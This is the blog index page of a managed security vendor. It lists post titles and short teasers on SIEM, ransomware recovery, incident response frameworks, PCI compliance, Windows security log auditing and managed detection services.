Talk to an expert

Category: Blog

8 Open Source SIEM Tools You Should Know

8 Open Source SIEM Tools You Should Know

Security Information and Event Management (SIEM) platforms are no longer limited to large enterprises. While proprietary platforms have much to offer small and mid-sized organizations, many security leaders are attracted to the lower licensing costs offered by open source SIEMs.  These options don't always share the same features as proprietary alternatives, but they can present […]
How to Recover From a Ransomware Attack

How to Recover From a Ransomware Attack

Ransomware is projected to cost victims $265 billion by 2031 — more than ten times the damages reported in 2021. However, average ransom amounts are growing at a much slower pace.  That can only mean that the frequency of successful ransomware attacks is growing. Cybercriminals are improving their techniques and targeting organizations more carefully than […]
Cloud Repatriation

6 Factors Driving the Cloud Repatriation Trend in 2024

Find out why business leaders are moving IT infrastructure back into on-premises solutions.  Cloud repatriation — also known as reverse cloud migration — is becoming more common as organizations face obstacles in their cloud infrastructure strategy. Organizations are increasingly moving data, applications, and workloads from public cloud environments back to on-premises or local private cloud […]

What is Proofpoint and How Does it Work?

Proofpoint is a cybersecurity platform that protects workers and data from cybercriminals that target email, social media, and mobile devices. It provides enterprise-level cloud-based solutions against phishing, social engineering, and Business Email Compromise (BEC) attacks.   Proofpoint Email Protection is the flagship product, protecting user inboxes from phishing scams, imposter emails, and advanced cybersecurity threats by […]
deliver-best-fit-cybersecurity-thumb

Deliver Best-Fit Cybersecurity for Every Client

In theory, cybersecurity is simple. Most managed cybersecurity service providers would agree they know what best practices should be implemented, and they know what technologies, skillsets and processes are required to achieve them. We all have a favorite cybersecurity framework to help compartmentalize and systematize a robust and comprehensive cybersecurity operation too. But here’s the […]
5 Pitfalls in Cloud Cybersecurity Shared Responsibility Model

5 Pitfalls in Cloud Cybersecurity Shared Responsibility Model 

Cloud computing offers many advantages for modern businesses, such as flexibility, scalability, efficiency, and innovation. But it also poses its own challenges and security risks. How can you secure your data and assets in the cloud? Who is in charge of what in the cloud environment?  The shared responsibility model helps address these questions and […]
Cybersecurity; essential-skills-blog-graphic-thumb

8 Essential Skills for Modern Cybersecurity Professionals

Cybersecurity is one of the most in-demand and rewarding fields in the IT industry. As cyberthreats continue to evolve and pose challenges to individuals and businesses, cybersecurity professionals need to have a diverse set of skills to protect data, networks, and systems.   We understand that each organization and security operations team will vary somewhat, and […]
Netsurion Named 2023 MSSP Alerts Top 250 MSSPs List

Netsurion Named a Top MSSP for 5th Year in a Row

The news is out and we’re proud to say Netsurion has been named, for a fifth year in a row, a top Managed Security Service Provider on MSSP Alert’s 2023 Top 250 MSSP list – carefully curated by the leader in global MSSP research. The MSSP Alert Top 250 list honors the top MSSPs, Managed […]
cybersecurity-revenue

This Common Strategy is Killing Your Cybersecurity Revenue

For many of you reading this, it’s Q4 and you might be looking at your YTD sales and scratching your head about the low customer adoption of your cybersecurity services. Cybersecurity is a hot commodity, right? Every business needs it, right? So why aren’t your sales numbers rocketing right off your spreadsheet? In talking to […]
thumb-cybersecurity-awareness-social; vulnerability management

Scary Cyber Threats of 2023 and How to Vanquish Them

In terms of new critical vulnerabilities released, each year seems to be worse than the last. Unfortunately, it’s a trend that security analysts are unlikely to see decrease anytime soon. As businesses integrate new technology into their tech stack, they also introduce new avenues of attack. And these attackers are relentless. Malicious actors are able […]
Which security functions outsource poorly and which outsource well

Which security functions outsource poorly and which outsource well

The IT security industry’s skill shortage is a well-worn topic. Survey after survey indicates that a lack of skilled personnel is a critical factor in weak security posture. If the skills are not available in your organization then you could: a) ignore the problem and hope for the best, or b) get help from the outside.
Who suffers more - cybercrime victims or cybersecurity professionals? data breach

Who suffers more - cybercrime victims or cybersecurity professionals?

So you got hit by a data breach, an all too common occurrence in today’s security environment. Who gets hit? Odds are you will say the customer. After all it’s their Personally Identifiable Information (PII) that was lost.
Why a Co-Managed SIEM?

Why a Co-Managed SIEM?

In simpler times, security technology approaches were clearly defined and primarily based on prevention with things like firewalls, anti-virus, web, and email gateways. There were relatively few available technology segments and a relatively clear distinction between buying security technology purchases and outsourcing engagements.
Why Comply with PCI Security Standards

Why Comply with PCI Security Standards

Why should you, as a merchant, comply with the PCI Security Standards? At first glance, especially if you are a smaller organization, it may seem like a lot of effort, and confusing to boot. But not only is compliance becoming increasingly important, it may not be the headache you expected.
Why is patching important to the security of your business?

Why is patching important to the security of your business?

If you are not keeping up with regular patching of your computer and the programs that run on it – then you are simply asking for trouble. Many of the breaches that make the news are caused by holes in software for which a patch existed by the vendor.
Why Managed Endpoint Security Eliminates Cybersecurity Blind Spots

Why Managed Endpoint Security Eliminates Cybersecurity Blind Spots

Incomplete cybersecurity information visibility comes at a cost. Without real-time comprehensive visibility, organizations experience blind spots that handcuff your cybersecurity protection and increase risk. IT environments are increasingly complex as they span on-premises, cloud, endpoint, and hybrid approaches.
Why Naming Conventions are Important to Log Monitoring

Why Naming Conventions are Important to Log Monitoring

Log monitoring is difficult for many reasons. For one thing there are not many events that unquestionably indicate an intrusion or malicious activity. If it were that easy the system would just prevent the attack in the first place.
Will CIOs Be the Final Victim After a Breach

Will CIOs Be the Final Victim After a Breach

In the wake of their breach, Target announced on March 5, 2014 that their CIO, Beth Jacob was announcing her resignation. This begs the question, Will CIO's be the final victim after a breach?
Wireless Security for Business

Wireless Security for Business

In today’s business world, a major draw for many customers is the ability to stay connected while outside the office. In order to provide this connectivity, typically means having a wireless network set up for your customers. However, it also means placing your business at a potential risk.
Your Best Defense Against Ransomware Might Be Your Employees

Your Best Defense Against Ransomware Might Be Your Employees

While your business’ data security program should consist of many components, perhaps the most effective defense to ransomware is building a culture of data security amongst your employees.
PCI DSS" (Payment Card Industry Data Security Standard). Your Voice for SMB Compliance Pains

Your Voice for SMB Compliance Pains

We believe that every business should have the means to protect themselves and their customers from cyberattacks, and the PCI Security Standards Council (PCI SCC) shares this belief. We’re working together to make compliance management more efficient, and therefore, strengthen the security of all merchants.
Navigating Your Managed Cybersecurity Options - Ask the Right Questions to Get the Right Solution.

Navigating Your Managed Cybersecurity Options

If you’re aiming to improve your organization’s threat detection and incident response (TDIR) capabilities, I’m willing to bet you’re annoyed and frustrated by trying to navigate the managed cybersecurity market that’s rife with imprecise terminology and vendors willing to bend definitions to fit their solutions. As a result, you have an extremely difficult job in trying to find the right solutions, let alone pick the best one.
Align Your Cyber-Risk Tolerance to Your Cybersecurity Posture

Align Your Cybersecurity Posture to Your Cyber-Risk Tolerance

Your business’s IT network is constantly connected to the Internet, includes countless SaaS applications and API connections, and is accessed by employees and vendors located anywhere in the world. As a result, your business is always exposed to cyber-risk, some of which is avoidable, but also some of which is unavoidable. Your cyber-risk tolerance, the […]
malware-names-thumb

Malware’s Crazy Names: Where Do They Come From? 

Do you ever wonder where malware names come from? What's in a name, after all? There’s Heartbleed, Melissa, and GooLoad. There’s even ILOVEYOU. All these names appear to have come from nowhere, just like the malware they’re attached to.   There is no universally adopted standard for naming malware, although you’d think there would be (more […]
Three myths surrounding cybersecurity

Three myths surrounding cybersecurity

A common dysfunction in many companies is the disconnect between the CISO, who views cybersecurity as an everyday priority, versus top management who may see it as a priority only when an intrusion is detected. Does your organization suffer from any of these?
SIEM and Return on Security Investment (RoSI)

SIEM and Return on Security Investment (RoSI)

The traditional method for calculating standard Return on Investment (RoI) is that it equals the gain minus the cost, divided by the cost. The higher the resulting value, the greater the RoI. The difficulty in calculating a return on security investment (RoSI), however, is that security tends not to increase profits (gain), but to decrease loss – meaning that the amount of loss avoided rather than the amount of gain achieved is the important element.

Believe it or not, compliance saves you money

Believe it or not, compliance saves you money

We all hear it over and over again: complying with data protection requirements is expensive. But did you know that the financial consequences of non-compliance can be far more expensive?
searching_for_free_open_source_cybersecurity_tools

10 Free and Open Source Cybersecurity Tools to Know

Open source software is an attractive option for many IT leaders and teams, especially at small and mid-sized organizations. Instead of paying large licensing fees to an enterprise software vendor, your team can customize the source code of free open source platforms and security tools.  The overall market for open source software services market was […]
Why Risk Classification is Important

Why Risk Classification is Important

Traditional threat models posit that it is necessary to protect against all attacks. While this may be true for a critical national defense network, it is unlikely to be true for the typical commercial enterprise. In fact many technically possible attacks are economically infeasible and thus not attempted by typical attackers.

Current Malware Trends: 5 Most Common Types of Malware in 2024

Current Malware Trends: 5 Most Common Types of Malware in 2024

Threat actors are converging on similar tactics across the board.  Cybercriminals are inventive and opportunistic, leveraging any advantage they can to gain access to sensitive data and assets.   However, they’re not as individualistic as often portrayed. Threat actors invest time and energy into maintaining relationships with other hackers, ransomware gangs, and criminal organizations. This can […]
What Does It Cost to Build a Security Operations Center (SOC)?

What Does It Cost to Build a Security Operations Center (SOC)?

Your organization needs dedicated space and infrastructure for conducting security operations.   Introduction to Security Operations Centers (SOCs)  Your SOC is where most of your organization’s security processes take place. Those processes require specialized equipment and expertise. Consolidating that footprint into a single place makes economic sense and drives security performance.  That doesn’t mean every […]
SANS Incident Response Framework

The SANS Incident Response Framework

Incident response plans give security teams a standardized set of procedures for mitigating the risks associated with security incidents. They make cyberattacks less disruptive, reduce operational downtime, and contain data breaches. Since every organization is unique, it needs to create a set of incident response playbooks designed to fit its security risk profile. It also […]
5 Most Overlooked Elements of Incident Response Plans

5 Most Overlooked Elements of Incident Response Plans

Learn how to establish robust, standardized security controls for handling any kind of incident. Data breaches and security incidents are tense, high-pressure situations where every second counts. In that scenario, having a clear and detailed incident response plan ready can mean the difference between success and failure. In an environment where one hour of downtime […]

The NIST Cybersecurity Framework (CSF)

Every organization wants to improve its information security capabilities. Part of a security leader’s job is identifying the best way to do that. However, no two organizations are exactly alike. Various stakeholders may have different ideas about what high-impact security excellence looks like in practice. Achieving meaningful security goals means getting everyone on the same […]
The Future of AI in Cybersecurity: How to Plan Ahead for AI Disruption

The Future of AI in Cybersecurity: How to Plan Ahead for AI Disruption

Find out how AI is likely to impact the cybersecurity industry in the next decade.  Artificial intelligence has been an integral part of the cybersecurity industry for several years now. However, the widespread public adoption of Large Language Models (LLMs) that took place in 2023 has brought new and unexpected changes to the security landscape.  […]

Introduction to Incident Response Frameworks

Efficient incident response processes lead to reduced downtime, lower security operations costs, and higher ROI on security spend. Cybersecurity is all about being prepared. Thorough incident response processes are crucial to your organizations’ ability to successfully overcome a security breach. Prevention is important, though it can only take your organization so far. There is always […]

Incident Response Frameworks Explained

The incident response process is necessarily a reactive one. You can only respond to an incident once it has been detected.   This makes it difficult to predict or optimize incident response outcomes. If an organization has never experienced a ransomware attack, how will it know when it’s ready to face one?  Incident response frameworks enable […]
Understanding MDR, EDR, EPP, and XDR

Understanding MDR, EDR, EPP, and XDR

The cybersecurity industry is notorious for coining terms and acronyms that rise and fall out of favor before they even have a chance to be fully understood. We get it – rapid innovation can be messy and lead to confusion and clutter. While it’s exciting and encouraging to see so many solution providers invent new solutions and improve upon others, resulting in new concepts, sometimes all of this terminology is honestly just an effort to stand out from the crowd.
Is your business at risk of a data breach?

Is your business at risk of a data breach?

2016 Verizon Breach Investigations Report (Part 1 of 3)
The 80 page report is packed with valuable data breach insights. We know time is valuable so we decided to save you some by sharing the 3 main topics you should understand from this report.
Welcome to the New Security World of SMB Partners

Welcome to the New Security World of SMB Partners

Yet another recent report confirms the obvious, that SMBs in general do not take security seriously enough. The truth is a bit more nuanced than that, of course—SMB execs generally take security very seriously, but they don’t have the dollars to do enough about it—although it amounts to the same thing.
Five Steps to Protect Retailers from Credit Card Theft

Five Steps to Protect Retailers from Credit Card Theft

The Georgia based fast food company, Chick-fil-A, has confirmed that it is investigating a potential credit card breach. The investigation is focused on the company’s point-of-sale (POS) network at some of its restaurants and the breach is thought to have occurred between December of 2013 and September of 2014.
Three paradoxes disrupting IT Security

Three paradoxes disrupting IT Security

2017 has been a banner year for IT Security. The massive publicity of attacks like WannaCry have focused public attention like never before on a hitherto obscure field. Non-technical people, including board members, nod gravely when listening as the CISO.
Monitoring File Permission Changes with the Windows Security Log

Monitoring File Permission Changes with the Windows Security Log

Unstructured data access governance is a big compliance concern.  Unstructured data is difficult to secure because there’s so much of it, it’s growing so fast and it is user created so it doesn’t automatically get categorized and controlled like structured data in databases.
Experimenting with Windows Security: Controls for Enforcing Policies

Experimenting with Windows Security: Controls for Enforcing Policies

Interest continues to build around pass-the-hash and related credential artifact attacks, like those made easy by Mimikatz. The main focus surrounding this subject has been hardening Windows against credential attacks, cleaning up artifacts left behind, or at least detecting PtH and related attacks when they occur.
Going Mining for Bitcoin

Going Mining for Bitcoin

While you’ve been busy defending against ransomware, the bad guys have been scheming about new ways to steal from you. Let’s review a tactic seen in the news called bitcoin mining.
Catching Hackers Living off the Land Requires More than Just Logs

Catching Hackers Living off the Land Requires More than Just Logs

If attackers can deploy a remote administration tool (RAT) on your network, it makes it so much easier for them. RATs make it luxurious for bad guys; it’s like being right there on your network. RATs can log keystrokes, capture screens, provide RDP-like remote control, steal password hashes, scan networks, scan for files and upload them back to home. So if you can deny attackers the use of RATs, you’ve just made life a lot harder for them.
Foster a Healthy Security Posture

Foster a Healthy Security Posture

Securing medical records is a complex undertaking. Healthcare organizations need an array of security technologies that can be used to prevent malicious attacks and keep personal healthcare information safe, while retaining the day-to-day ease-of-use.
Detecting Ransomware: The Same as Detecting Any Kind of Malware?

Detecting Ransomware: The Same as Detecting Any Kind of Malware?

Ransomware burst onto the scene with high profile attacks against hospitals, law firms and other organizations.  What is it and how can you detect it? 
Balancing Privacy and Security

Balancing Privacy and Security

In the wake of the most recent terrorist bombing in Boston, it is easy to understand why some people would be willing to sacrifice a few liberties to the government in favor of more security. A common train of thought is that an honest person does not have anything to hide, so the intrusion into our private lives is really a minor thing. In a Utopian society, I would tend to agree with that sentiment, but we live somewhere else.
Top 6 uses for SIEM

Top 6 uses for SIEM

Security Information and Event Management (SIEM) is a term coined by Gartner in 2005 to describe technology used to monitor and help manage user and service privileges, directory services and other system configuration changes; as well as providing log auditing and review and incident response

Is the IT Organizational Matrix an IT Security Problem?

Is the IT Organizational Matrix an IT Security Problem?

Do you embrace the matrix? The fact is, once networks get to a certain size, IT organizations begin to specialize and small kingdoms emerge.
Prevention is Key in Cybersecurity

Prevention is Key in Cybersecurity

A lot of data, an overwhelming amount actually, is available from hundreds of sources, but rarely is it observed. Having something and getting value from it are entirely different.
criminals; Every Merchant Needs Electronic Data Protection

Every Merchant Needs Electronic Data Protection

How many days go by between news stories involving computer breaches? The truth of the matter is that as long as sensitive data is gathered by merchants, thieves will attempt to steal it.
Mitigate Software Supply Chain Attacks with SIEM and EDR

Mitigate Software Supply Chain Attacks with SIEM and EDR

At Black Hat 2019, Eric Doerr, GM of the Microsoft Security Response Center, reminded attendees of the interconnectedness of enterprise software supply chains and of their vulnerability to attack. Eric highlighted how supply chain compromises come in many guises
MDR is a Critical Capability for MSSPs: Keys to Making the Right Choice

MDR is a Critical Capability for MSSPs: Keys to Making the Right Choice

MSSPs need airtight threat detection and rapid, reliable remediation. The optimal way to do this is to ensure you have top-notch MDR capabilities 24/7/365. Many MSSPs partner with an MDR provider to achieve this.
Do Hackers Fear U.S. Jails?

Do Hackers Fear U.S. Jails?

In what should only be considered a victory for the U.S. DOJ, 2 of the 4 alleged Subway hackers responsible for potentially $10 Million dollars in computer fraud have been sentenced, and 1 of the remaining criminal’s trial is set to begin shortly.
Just how dangerous is ransomware?

Just how dangerous is ransomware?

Ransomware is a business’ worst nightmare. This malware infects computers and restricts the users from accessing any of their data until paying the ransom. What would you do to get that data back?
Cybercrime Find Out Who Is Affected By A Data Breach?

Find Out Who Is Affected By A Data Breach?

The number of data breaches continues to increase. Cybercrime affects your brand, your customers and your employees in ways that are unrecoverable at times. Don't let your business be affected next.
Five Fallacies That Are Holding Back Adoption of Threat Hunting

Five Fallacies That Are Holding Back Adoption of Threat Hunting

Organizations can no longer afford to be just reactive, relying solely on detection and response when it comes to cybersecurity. Threat hunting is the next step. It is a proactive approach to uncovering threats that otherwise go undetected, like multi-stage ransomware attacks and malware that lies dormant in your network until activated to exfiltrate data.
 
Case of the Disappearing Objects: How to Audit Who Deleted What in Active Directory

Case of the Disappearing Objects: How to Audit Who Deleted What in Active Directory

I often get asked how to audit the deletion of objects in Active Directory. It’s pretty easy to do this with the Windows Security Log – especially for tracking deletion of users and groups which I’ll show you first. All you have to do is enable “Audit user accounts” and “Audit security group management” in the Default Domain Controllers Policy GPO.
Can general purpose tools work for IT security?

Can general purpose tools work for IT security?

This post got me thinking about a recent conversation I had with the CISO of a financial company. He commented on how quickly his team was able to instantiate a big data project with open source tools.
Three key advantages for SIEM-As-A-Service

Three key advantages for SIEM-As-A-Service

Security Information and Event Management (SIEM) technology is an essential component in a modern defense-in-depth strategy for IT Security. SIEM is described as such in every Best Practice recommendation from industry groups and security pundits. The absence of SIEM is repeatedly noted in Verizon Enterprise Data Breach Investigations Report as a factor in late discovery of breaches.
Top three high risk behaviors that compromise IT Security

Top three high risk behaviors that compromise IT Security

The insider threat is typically much more infrequent than external attacks, but they usually pose a much higher severity of risk for organizations when they do happen. While they can be perpetrated by malicious actors, it is more common the result of negligence.
Microsoft Exchange Servers

Ten Steps to Defend Your Microsoft Exchange Servers from ProxyLogon Exploit

Microsoft has detected multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. According to reports, observations of attacks leveraging the critical vulnerabilities are increasing very rapidly. In the span of a few days, over 30,000 organizations – small businesses and municipalities included - across the U.S. have been hacked.
IT Service Providers: Mind the Security Gap

IT Service Providers: Mind the Security Gap

Persistent threats affecting businesses of all sizes and in all verticals are becoming more consistent and hitting more frequently. The 2016 Verizon Data Breach report analyzed 100,000 incidents, of which 3,141 were confirmed data breaches.
No Business is Too Small for Hackers!

No Business is Too Small for Hackers!

It's National Small Business Week! Let's celebrate the hard work you do and make sure your business continues to grow. Have you ever thought about what would happen if your business is affected by a data breach? 
IT Community Shaken By Shellshock Vulnerabilities

IT Community Shaken By Shellshock Vulnerabilities

In the wake of Heartbleed, comes a new form of exposure that could potentially do much more damage than any other vulnerability of its kind. It is known as Shellshock. Shellshock affects Linux and UNIX implementations that use the BASHcommand interpreter.
Key Takeaways from MITRE ATT&CKcon 3.0 for Defenders

Key Takeaways from MITRE ATT&CKcon 3.0 for Defenders

MITRE ATT&CKcon 3.0, the conference dedicated to the ATT&CK community, returned at MITRE headquarters in Virginia last month. As a refresher, MITRE ATT&CK® is a knowledge base of adversary tactics and techniques based on real-world observations
Top 3 Microsoft 365 Security Concerns and What to do About Them

Top 3 Microsoft 365 Security Concerns and What to do About Them

Microsoft 365 is immensely popular across all industry verticals in the small-to-medium-sized business (SMB) space. It is often the killer app for a business and contains valuable, critical information about the business. Accordingly, Microsoft 365 resiliency and defense are top concerns on IT leader’s minds.
Demystifying PCI Compliance

Demystifying PCI Compliance

PCI compliance: that daunting phrase you always hear in the world of payments…but never truly understand. Well we’re here to sum it up for you—what it is, why it’s important and what you need to meet this standard.
 
EventTracker Enterprise and the Cyber Kill Chain

EventTracker Enterprise and the Cyber Kill Chain

Defense strategies that focus exclusively on the perimeter and on prevention do not take into account the kill chain life cycle approach; this is a reason why attackers are continuing to be so successful.
Security Logging as a Detective and Deterrent Control Against Rogue Admins

Security Logging as a Detective and Deterrent Control Against Rogue Admins

Intrusion detection and compliance are the focus of log management, SIEM and security logging.  But security logs, when managed correctly are also the only control over rogue admins.  Once root or admin authority has been given to, or acquired by, a user, there is little they cannot do.
Criminal Gang NOBELIUM Ramps Up Attacks

Criminal Gang NOBELIUM Ramps Up Attacks

Threat researchers detected threat group NOBELIUM conducting several waves of malicious spear phishing email campaigns. Each wave used different technical lures and social engineering to fine-tune which threat performed best against targeted government agencies, consultants, and non-profits in over 20 countries.
The Perimeter is Dead: Long-live the Perimeter

The Perimeter is Dead: Long-live the Perimeter

In 2005, the Department of Homeland Security commissioned Livermore National Labs to produce a kind of pre-emptive post-mortem report.
Ransomware is only getting started

Ransomware is only getting started

Ransomware is about denying you access to your data via encryption. But that denial has to be of a great enough magnitude create sufficient motivation for the victim to pay.
Are you guilty of any of these PCI myths?

Are you guilty of any of these PCI myths?

We have gathered what have been common comments that we hear from business owners. And today, we would like to bust these myths!
Tips for Protecting Information While on the Go: What Summer Travelers Need to Know About Security

Tips for Protecting Information While on the Go: What Summer Travelers Need to Know About Security

As the summer travel season quickly approaches, most people envision exchanging work clothes and school books for shorts, flip flops, and beach umbrellas as they look forward to that well-deserved vacation. Unfortunately, hackers have their own plans this summer...
May Your Holidays be Merry, Bright, and Hack Free: Security Tips for the Biggest Shopping Season

May Your Holidays be Merry, Bright, and Hack Free: Security Tips for the Biggest Shopping Season

Though there are many companies out there responsible for securing merchant locations from the risks of data breaches, people’s own risky behavior often leads to their ID theft problems, no matter how well merchants protect them. And with more and more merchants accepting chip cards this year, hackers are likely to go back to tried and true methods for preying on individual cardholders.
How to Use Process Tracking Events in the Windows Security Log

How to Use Process Tracking Events in the Windows Security Log

I think one of the most underutilized features of Windows Auditing and the Security Log are Process Tracking events. In Windows 2003/XP you get these events by simply enabling the Process Tracking audit policy.
How to Protect Healthcare Data: 5 Cybersecurity Tips for MSPs

How to Protect Healthcare Data: 5 Cybersecurity Tips for MSPs

For MSPs serving clients in the healthcare industry, protecting data can be complex. With compliance enforcement like HIPAA , for instance, distinguishing the owner of your clients’ data is critical —especially due to the lack of security awareness training amidst healthcare end users. Here are the five key data security tips to better protect SMB clients in healthcare.
What good is Threat Intelligence integration in a SIEM?

What good is Threat Intelligence integration in a SIEM?

Bad actors/actions are more and more prevalent on the Internet. Who are they? What are they up to? Are they prowling in your network? The first two questions are answered by Threat Intelligence (TI), the last one can be provided by a SIEM that integrates TI into its functionality.
Netsurion Defense Against Backoff

Netsurion Defense Against Backoff

In the wake of BackOff, and numerous other data breaches, consumers are demanding answers into the how and why surrounding companies who have inadvertently allowed data to be compromised given security measures accessible today.
SIEM, UEBA, SOAR and Your Cybersecurity Arsenal

SIEM, UEBA, SOAR and Your Cybersecurity Arsenal

The evolution of Security Information and Event Management (SIEM) solutions has made a few key shifts over time. It started as simply collecting and storing logs, then morphed into correlating information with rules and alerting a team when something suspicious was happening.
When is an alert not an alert?

When is an alert not an alert?

Users of the EventTracker platform know that one of its primary functions is to apply built-in knowledge to reduce the flood of all security/log data to a much smaller stream of prioritized alerts.
SIEM and Return on Investment: Four Pillars for Success

SIEM and Return on Investment: Four Pillars for Success

Return on investment (ROI) - it is the Achilles heel of IT management. Nobody minds spending money to avoid costs, prevent disasters, and ultimately yield more than the initial investment outlay. But is the investment justified?
Protecting Legal Data: 3 Ways MSPs Can Enhance Cybersecurity

Protecting Legal Data: 3 Ways MSPs Can Enhance Cybersecurity

The legal world is centered on offering clients protection—and in the current technology environment, that extends to cybersecurity. With the proper security procedures, policies, training, and IT security in law firms, advanced cybersecurity is yet another way that lawyers can protect their clients today.
MSPs Need Both Cybersecurity Automation and Human Expertise

MSPs Need Both Cybersecurity Automation and Human Expertise

The rising level of security threats and public incidents demand new approaches to people, processes, and technology that optimize manual processes and harness the benefits of automation. Automation and machine learning (ML) remove inefficiencies and the potential for error or security gaps. While programmatic threat detection and incident response minimize false positives along with staff and skill shortages, it is not a panacea or quick fix. Human analysts are still the most vital link in cybersecurity defense that differentiates you in the marketplace.
How Strong Are Your Passwords? Tips To Keep You Protected

How Strong Are Your Passwords? Tips To Keep You Protected

Passwords keep your accounts and network safe but may also be a gateway for hackers. Here are some quick tips we recommend when creating your passwords.
Demystifying MDR: Five Myths for MSSPs

Demystifying MDR: Five Myths for MSSPs

Small-to-medium-sized businesses (SMBs) are continuously seeking ways to safeguard their data and resiliency against persistent criminals through increased cyber defenses. But their security service providers often find that they are ill equipped to address advanced threats, let alone know where to begin. Managed Detection and Response (MDR) solutions are gaining traction with resource-constrained organizations looking for 24/7 proactive protection. The threat landscape and MDR marketplace is evolving, creating confusion for Managed Security Service Providers (MSSPs) and customers alike.
Auditing File Shares with the Windows Security Log

Auditing File Shares with the Windows Security Log

Over the years, security admins have repeatedly asked me how to audit file shares in Windows.  Until Windows Server 2008, there were no specific events for file shares.
How do you determine IT security risk?

How do you determine IT security risk?

How much security is enough? That’s a hard question to answer. You could spend $1 or $1M on security and still ask the same question. It’s a trick question; there is no correct answer.
How many people does it take to run a SIEM?

How many people does it take to run a SIEM?

You must have a heard light bulb jokes, for example: How many optimists does it take to screw in a light bulb? None, they’re convinced that the power will come back on soon.
Healthcare Practices are at Particularly High Risk of Data Breach

Healthcare Practices are at Particularly High Risk of Data Breach

The CDC estimates that close to 80% of office-based physicians use some form of electronic medical records. This increase, coupled with recent breaches of patients’ PHI and PII, has highlighted the need for security of medical office networks.
Helping Enterprises of All Sizes Accelerate Their Security Journey

Helping Enterprises of All Sizes Accelerate Their Security Journey

Change is the only constant in the IT security space. Here at Netsurion, we strive to empower organizations to take on ever-evolving cyber threats regardless of the size and scope of their business operations. With this core mission in mind, we are proud to introduce John Addeo as our new Chief Revenue Officer.
Black Hat Recap: Cybersecurity Insights That Enhance Security Operations

Black Hat Recap: Cybersecurity Insights That Enhance Security Operations

Black Hat 2019 was a learning experience and success for all. All of the hackers, presenters, vendors, and attendees have gone home, but what you learned in Vegas doesn’t have to stay in Vegas. Hopefully you are bringing new information and insights back to your daily operations. Here are some of Netsurion’s key takeaways from Black Hat 2019.
Tracking removable storage with the Windows Security Log

Tracking removable storage with the Windows Security Log

With data breaches and Snowden-like information grabs, I’m getting increased requests for how to track data moving to and from removable storage, such as flash drives. The good news is that the Windows Security Log does offer a way to audit removable storage access.
Use VPN Properly to Support Work-from-Home Employees

Use VPN Properly to Support Work-from-Home Employees

With most employees working from home amid COVID-19 (coronavirus) outbreak, VPN servers have now become paramount to a company's backbone, and their security and availability must be the focus going forward for IT teams. It is now more important than ever that companies and IT staff set up systems to capture metrics about the performance and availability of VPN services.
Thieves Tried to Steal Credit Cards from Nordstrom

Thieves Tried to Steal Credit Cards from Nordstrom

The department store giant garnered unwanted attention earlier this month when they announced that a Florida store fell victim to a team of thieves who attached extremely small devices called key loggers in line with their keyboards where they plug into the registers.
Learn Why Data Privacy is Good for Your Business

Learn Why Data Privacy is Good for Your Business

Following many high-profile data breaches, consumers have elevated data privacy to front-page news and included it as criteria for brand selection and engagement. Consumers around the globe now realize that they aren’t always aware or informed about how their private information is used or shared. Fifty-four percent of consumers are more concerned with protecting their personal information than they were a year ago, according to a survey reported by Security Magazine.
Certificates and Digitally Signed Applications: A Double Edged Sword

Certificates and Digitally Signed Applications: A Double Edged Sword

Windows supports the digitally signing of EXEs and other application files so that you can verify the provenance of software before it executes on your system.  This is an important element in the defense against malware.  When a software publisher like Adobe signs their application they use the private key associated with a certificate they’ve obtained from one of the major certification authorities like Verisign.
Avoid Three Common Active Directory Security Pitfalls

Avoid Three Common Active Directory Security Pitfalls

While the threats have changed over the past decade, the way systems and networks are managed have not. We continue with the same operations and support paradigm, despite the fact that internal systems are compromised regularly.
Buy, Rent, or Uber Your Security Operations Center

Buy, Rent, or Uber Your Security Operations Center

For cyber criminals, everyone’s a target. We must assume that, at some point, every organization’s IT infrastructure will be breached. That’s why we need to continuously monitor, investigate, and respond to cyber threats 24/365 if we are to avoid costly breaches.
Advanced HTTP Flood Attacks Are Becoming Commonplace: Make Sure Your Organization is Prepared

Advanced HTTP Flood Attacks Are Becoming Commonplace: Make Sure Your Organization is Prepared

Cybercriminals are now leveraging attack vectors previously only available to well-funded nation-state actors. Security professionals know the dangers associated with distributed denial-of-service attacks (DDoS). These attacks typically target the core data transmission protocols that form the foundation of every organization' internet services. 
Cloud Security Starts at Home

Cloud Security Starts at Home

Cloud security is getting attention and that’s as it should be.  But before you get hung up on techie security details, like whether SAML is more secure than OpenID Connect and the like, it’s good to take a step back.  One of the tenets of information security is to follow the risk.
Top 3 traits of a successful Security Operations Center

Top 3 traits of a successful Security Operations Center

Traditional areas of risk — financial risk, operational risk, geopolitical risk, risk of natural disasters — have been part of organizations’ risk management for a long time. Recently, information security has bubbled to the top, and now companies are starting to put weight behind IT security and Security Operations Centers (SOC).
Think you are too small to be hacked?

Think you are too small to be hacked?

Why has ransomware exploded on to the scene in 2017? Because it works.
Time is money. Downtime is loss of money.

Time is money. Downtime is loss of money.

The technological revolution has introduced a plethora of advanced solutions to help identify and stop intrusions. There is no shortage of hype, innovation, and emerging trends in today's security markets. However, data leaks and breaches persist.
SIEM: Sprint or Marathon?

SIEM: Sprint or Marathon?

Winning a marathon requires dedication and preparation. Over long periods of time. A sprint requires intense energy but for a short period of time. While some tasks in IT Security are closer to a sprint (e.g., configuring a firewall), many, like deploying and using a Security Information and Event Management (SIEM) solution, are closer to a marathon.
Practical Ways to Implement Threat Hunting

Practical Ways to Implement Threat Hunting

If you think your organization is too small to be targeted by threat actors, think again. Over 60% of organizations have experienced an exploit or breach, so the stealthy and ever-evolving hacker may already be in your organization performing reconnaissance or awaiting strategic command and control (C&C) instructions.
MSPs: How to Add Security Services Fast and Affordably

MSPs: How to Add Security Services Fast and Affordably

You’ve seen it over and over again in the headlines – small subcontractors are often soft-target gateways for hacking large clients. Middle-tier businesses are very attractive and vulnerable targets for ransomware attacks. And, as recently seen in the news, Managed Service Providers (MSPs) attacked through trusted supply-chain software vendors can put their own clients at risk. These unfortunate facts have created a demand for IT service providers, including MSPs, to expand their cybersecurity offerings or at least explain their own security preparedness to customers.
Backoff Has Been Upgraded Harder to Detect

Backoff Has Been Upgraded Harder to Detect

So when you are a hacker and you write the most successful financial transaction hacking software in history, what do you do next? Well, if you are the makers of Backoff, you upgrade it.
MSPs Versus Ransomware in 2022: Where Multi-Layered Security Fits In

MSPs Versus Ransomware in 2022: Where Multi-Layered Security Fits In

Skyrocketing ransomware threats and extortion demands show no sign of slowing down in 2022. Average ransomware demands surged by 518% in the first half of 2021 compared to 2020, while payments climbed by 82% in the same period, according to Infosecurity Magazine. Crippling ransomware attacks caused an average business downtime of six days with costs in the millions.
Four Key Steps to Rapid Incident Response

Four Key Steps to Rapid Incident Response

